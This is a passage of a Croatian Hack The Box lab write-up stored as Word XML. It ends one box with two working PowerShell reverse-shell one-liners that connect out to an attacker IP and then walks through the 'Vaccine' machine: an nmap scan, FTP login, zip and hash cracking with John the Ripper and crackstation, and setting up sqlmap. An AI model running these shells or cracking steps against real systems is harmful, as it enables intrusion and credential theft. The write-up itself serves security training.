        <w:t xml:space="preserve">unutar </w:t>
      </w:r>
      <w:r w:rsidR="0021519D" w:rsidRPr="0021519D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="0021519D">
        <w:t>-a ciljnog računala.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6F91C" w14:textId="77777777" w:rsidR="00D506D1" w:rsidRDefault="00D506D1" w:rsidP="00C66C3B"/>
    <w:p w14:paraId="53EE21C4" w14:textId="77777777" w:rsidR="0021519D" w:rsidRDefault="0021519D" w:rsidP="0021519D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5D67ED2D" wp14:editId="6D3B8985">
            <wp:extent cx="4489609" cy="4502989"/>
            <wp:effectExtent l="0" t="0" r="635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339" cy="452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A7F4" w14:textId="493209BD" w:rsidR="0021519D" w:rsidRDefault="0021519D" w:rsidP="0021519D">
      <w:pPr>
        <w:pStyle w:val="Opisslike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 w:rsidR="00E602CA">
        <w:t xml:space="preserve"> Korisnički podaci ciljnog računala</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7BF6A" w14:textId="77777777" w:rsidR="00D506D1" w:rsidRPr="00D506D1" w:rsidRDefault="00D506D1" w:rsidP="00D506D1"/>
    <w:p w14:paraId="01B9133D" w14:textId="425B3107" w:rsidR="0043159E" w:rsidRDefault="0021519D" w:rsidP="00D506D1">
      <w:r>
        <w:t>Te tako imate pristup svim podacima na ciljnom računalu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC3DD7" w14:textId="1392855A" w:rsidR="005E2A9B" w:rsidRPr="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="00C66C3B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E2A9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">*Korištena </w:t>
      </w:r>
      <w:r w:rsidRPr="005E2A9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reverse PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="005E2A9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> skripta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5377BD11" w14:textId="339D2A4A" w:rsidR="00655239" w:rsidRDefault="00655239" w:rsidP="00C66C3B"/>
    <w:p w14:paraId="5E7FF038" w14:textId="5F38E3E3" w:rsidR="00980016" w:rsidRDefault="00980016" w:rsidP="00980016">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:wrap="around"/>
      </w:pPr>
      <w:r>
        <w:t>$client = New-Object System.Net.Sockets.TCPClient('192.168.254.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12805BC5" w14:textId="6D2F82B6" w:rsidR="00C4523F" w:rsidRDefault="00980016" w:rsidP="00980016">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:wrap="around"/>
      </w:pPr>
      <w:r>
        <w:t>$sm=(New-Object Net.Sockets.TCPClient('192.168.254.1',55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2&gt;&amp;1));$sm.Write($st,0,$st.Length)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735C8642" w14:textId="2878C16E" w:rsidR="006C3EC9" w:rsidRDefault="006C3EC9" w:rsidP="006C3EC9">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc75785396"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hack The Box Starting Point: Vaccine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="12A5B8B3" w14:textId="1BE231B4" w:rsidR="00A26C72" w:rsidRPr="00A26C72" w:rsidRDefault="00A26C72" w:rsidP="00A26C72">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc75785397"/>
      <w:r>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="1883AF9D" w14:textId="77777777" w:rsidR="00E35BBA" w:rsidRDefault="00E35BBA" w:rsidP="00463018">
      <w:r>
        <w:t>Prvi korak kod rješavanja ovog Starting Pointa</w:t>
      </w:r>
      <w:r w:rsidR="00463018">
        <w:t xml:space="preserve"> je skeniranje portova sa naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E3B990" w14:textId="11D64DA8" w:rsidR="00E35BBA" w:rsidRDefault="00E35BBA" w:rsidP="00E35BBA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ nmap –sC –sV –Pn 10.10.10.46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C21D213" w14:textId="586BE38B" w:rsidR="00463018" w:rsidRPr="00146AC9" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t xml:space="preserve"> Skeniranje otkriva 3 otvorena porta(ftp, ssh, tcp), dok su ostali portovi zatvoreni(997 zatvorenih).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18851CBD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6E83D7C2" wp14:editId="52F90FEE">
            <wp:extent cx="5762625" cy="3743325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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3F79" w14:textId="08AAABE2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 xml:space="preserve">Slika </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>31.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463018">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Skeniranje portova</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ACB4AD" w14:textId="77777777" w:rsidR="004A0873" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E530FE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Sljedeći korak je povezivanje na udaljeni sustav pomoću protokola ftp koji služi za prijenos podataka između korisnika i sustava.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E243359" w14:textId="77777777" w:rsidR="004A0873" w:rsidRDefault="004A0873" w:rsidP="004A0873">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ ftp 10.10.10.46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BE35D" w14:textId="60BCAADD" w:rsidR="00463018" w:rsidRDefault="004A0873" w:rsidP="00463018">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="00463018" w:rsidRPr="00E530FE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">atim je potrebno unijeti korisničke podatke kako bih pristupili sustavu. Korisničko ime je </w:t>
      </w:r>
      <w:r w:rsidR="00463018" w:rsidRPr="004A0873">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ftpuser</w:t>
      </w:r>
      <w:r w:rsidR="00463018" w:rsidRPr="00E530FE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, a lozinka je </w:t>
      </w:r>
      <w:r w:rsidR="00463018" w:rsidRPr="004A0873">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mc@F1l3ZilL4</w:t>
      </w:r>
      <w:r w:rsidR="00463018" w:rsidRPr="00E530FE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>. Kada smo se uspješno spojili na sustav potrebno je pronaći i pre</w:t>
      </w:r>
      <w:r w:rsidR="00463018">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">uzeti datoteku backup.zip(Slika </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00463018" w:rsidRPr="00E530FE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidR="00463018">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B02EB3" w14:textId="77777777" w:rsidR="004A0873" w:rsidRPr="00E530FE" w:rsidRDefault="004A0873" w:rsidP="00463018">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1E61E4" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E51160" wp14:editId="69D869A3">
            <wp:extent cx="5762625" cy="2219325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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5273" w14:textId="047CB077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 xml:space="preserve">Slika </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463018">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> FTP protokol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16051993" w14:textId="77777777" w:rsidR="00A96E98" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t xml:space="preserve">Naredbom </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538754C7" w14:textId="421FEF68" w:rsidR="00A96E98" w:rsidRDefault="00A96E98" w:rsidP="00A96E98">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ zip2john backup.zip &gt; hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CDF1E7" w14:textId="5E303C53" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>dobijemo hash vrijednost od backup.zip datoteke. Zatim ako pokušavamo otpakirati backup.zip datoteku trebamo unijeti lozinku koju tek trebamo saznati na sljedeći način(Slika 3</w:t>
      </w:r>
      <w:r w:rsidR="00A96E98">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B872A4B" w14:textId="54C0DBF4" w:rsidR="00A96E98" w:rsidRDefault="00A96E98" w:rsidP="00A96E98">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ unzip backup.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC5E298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2E598348" wp14:editId="3B0E3EAB">
            <wp:extent cx="5762625" cy="3495675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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931F" w14:textId="24108FE6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 xml:space="preserve">Slika </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>33.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463018">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hash vrijednost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B4CAA8" w14:textId="77777777" w:rsidR="00A96E98" w:rsidRDefault="00A96E98" w:rsidP="00463018"/>
    <w:p w14:paraId="05C2FD01" w14:textId="77777777" w:rsidR="00A96E98" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lozinku ćemo dobiti upotrebljavajući JohntheRipper i rockyou.txt na način da ćemo unijeti naredbu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CCAE50" w14:textId="364F38D4" w:rsidR="00A96E98" w:rsidRDefault="00A96E98" w:rsidP="00A96E98">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t>$ john hash --fork=4 --wordlist=/home/igusic00/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A22E50E" w14:textId="23C27FE2" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t xml:space="preserve">Iz slike(Slika </w:t>
      </w:r>
      <w:r w:rsidR="00A96E98">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>4)</w:t>
      </w:r>
      <w:r w:rsidR="00A96E98">
        <w:t xml:space="preserve"> vidimo da je dobivena lozinka </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E98">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>741852963</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA06ED" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018"/>
    <w:p w14:paraId="36A89ED2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2C86F3F9" wp14:editId="504A66BB">
            <wp:extent cx="5762625" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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1A757" w14:textId="61C7F7A5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 xml:space="preserve">Slika </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>34.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463018">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DDB8A1" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>Sada kada znamo lozinku možemo otpakirati datoteku backup.zip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5900D46D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5153F484" wp14:editId="1CD84AF7">
            <wp:extent cx="5753100" cy="1857375"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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2E92" w14:textId="57525687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 xml:space="preserve">Slika </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>35.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463018">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unzip backup.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732149C3" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>Nakon otpakiranja dobili smo dvije datoteke index.php i style.css. Iz datoteke index.php uzimamo vrijednost hash funkcije koju ćemo iskoristiti kako bi saznali lozinku iz nje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F17BCEB" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C0A57F" wp14:editId="6999C2B7">
            <wp:extent cx="5762625" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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5F9C" w14:textId="506BE771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 xml:space="preserve">Slika </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>36.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463018">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Indeks.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DBAE27" w14:textId="5F1EF471" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t xml:space="preserve">Na web stranici </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="0086397C">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>crackstation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> unesemo hash vrijednost i kao rezultat dobije</w:t>
      </w:r>
      <w:r w:rsidR="00036E9B">
        <w:t xml:space="preserve">mo lozinku </w:t>
      </w:r>
      <w:r w:rsidR="00036E9B" w:rsidRPr="00036E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>qwerty789</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B4D6C6" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018"/>
    <w:p w14:paraId="3BA04425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4ACFCE8E" wp14:editId="213402E4">
            <wp:extent cx="5753100" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="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0D98" w14:textId="407B58FF" w:rsid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37. Hash cracker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E7E49" w14:textId="77777777" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630F874A" w14:textId="77777777" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C61ABD" w14:textId="77777777" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFCC456" w14:textId="77777777" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0504DD" w14:textId="77777777" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A98623B" w14:textId="77777777" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FD6A5E" w14:textId="77777777" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE67896" w14:textId="77777777" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AACBD34" w14:textId="77777777" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE33BE6" w14:textId="77777777" w:rsidR="00225B28" w:rsidRPr="00463018" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47962CBD" w14:textId="7AABAE88" w:rsidR="00B900EA" w:rsidRDefault="00B900EA" w:rsidP="00B900EA">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc75785398"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1B7DAF63" w14:textId="0084C78D" w:rsidR="00225B28" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:r>
        <w:t>Nakon što smo dobili lozinku gotovi smo s fazom enumeracije sustava i prelazimo na foothold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D4502" w14:textId="014C809F" w:rsidR="00463018" w:rsidRDefault="00225B28" w:rsidP="00463018">
      <w:r>
        <w:t xml:space="preserve">U web browser </w:t>
      </w:r>
      <w:r w:rsidR="00463018">
        <w:t>unosi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mo ip adresu 10.10.10.46 </w:t>
      </w:r>
      <w:r w:rsidR="00036E9B">
        <w:t xml:space="preserve">i sa korisničkim imenom </w:t>
      </w:r>
      <w:r w:rsidR="00036E9B" w:rsidRPr="00036E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00036E9B">
        <w:t xml:space="preserve"> i lozinkom </w:t>
      </w:r>
      <w:r w:rsidR="00036E9B" w:rsidRPr="00036E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>qwerty789</w:t>
      </w:r>
      <w:r w:rsidR="00463018">
        <w:t xml:space="preserve"> logiramo se na stranicu MegaCorp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D0776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635FAE7B" wp14:editId="68B593BA">
            <wp:extent cx="5762625" cy="2190750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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1A60" w14:textId="3B694F07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38. Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4164ACEA" w14:textId="5379D6F7" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t xml:space="preserve">Stranica koja se otvori izgleda kao na Slici </w:t>
      </w:r>
      <w:r w:rsidR="00036E9B">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">9 i služi za pretraživanje </w:t>
      </w:r>
      <w:r w:rsidR="00036E9B">
        <w:t xml:space="preserve">automobila. Ako želimo nešto pretražiti dobijemo ovo: </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="00036E9B">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>http://10.10.10.46/dashboard.php?search=a</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4A7741" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018"/>
    <w:p w14:paraId="19CDE82F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18F127C1" wp14:editId="768EE124">
            <wp:extent cx="5753100" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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1850" w14:textId="096416FA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39. Pretraživanje</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E623F" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:t>Stranica uzima GET zahtjev s pretraživanjem parametara. Ovaj se URL isporučuje na sqlmap kako bi testirali ranjivosti SQL-a. Budući da stranica upotrebljava cookies to možemo provjeriti da stisnemo desni klik na stranicu i odaberemo Inspect element -&gt; Storage gdje kopiramo vrijednost PHPSESSID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ABD2AB" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62600D99" wp14:editId="19F69999">
            <wp:extent cx="5753100" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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C468" w14:textId="5CD9A26C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40. PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24C543" w14:textId="77777777" w:rsidR="00463018" w:rsidRDefault="00463018" w:rsidP="00463018">
      <w:r>
        <w:t>Da bi konstruirali SQL upit potrebno je obnoviti verziju sql mape pomoću git naredbe clone i odgovarajućeg linka s novom verzijom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04389907" w14:textId="731BDBA7" w:rsidR="00036E9B" w:rsidRDefault="00036E9B" w:rsidP="00036E9B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ git clone --depth 1 </w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidRPr="00033353">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>https://github.com/sqlmapproject/sqlmap.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> sqlmap-de</w:t>
      </w:r>
      <w:r w:rsidR="0095193D">
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB0825E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246F5574" wp14:editId="5E2E18EF">
            <wp:extent cx="5753100" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42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209F" w14:textId="64BD3C2B" w:rsidR="00463018" w:rsidRPr="00463018" w:rsidRDefault="00463018" w:rsidP="00463018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Slika 41.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463018">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL update</w:t>
      </w:r>
    </w:p>
